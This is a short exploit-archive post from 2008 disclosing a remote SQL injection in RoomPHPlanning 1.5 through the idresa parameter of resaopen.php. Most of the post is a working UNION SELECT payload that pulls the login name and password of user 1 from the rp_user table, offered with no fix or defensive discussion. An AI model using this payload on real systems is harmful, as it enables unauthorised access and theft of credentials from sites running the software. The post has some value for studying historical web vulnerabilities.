RoomPHPlanning 1.5 (idresa) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RoomPHPlanning 1.5 (idresa) Remote SQL Injection Vulnerability
# Published : 2008-05-24
# Author : His0k4
# Previous Title : Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities
# Next Title : phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability

###########################################
{+} RoomPHPlanning v1.5 remote SQL injection exploit
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
{+} Exploit :
    http://localhost/[script_path]/resaopen.php?idresa={SQL}
{+} Example :
    http://localhost/[script_path]/resaopen.php?idresa=-1 UNION SELECT 1,2,3,4,5,6,concat(LoginUs,0x3a,PwdUs),8,9 FROM rp_user where IdUs=1--
############################################

# www.Syue.com [2008-05-24]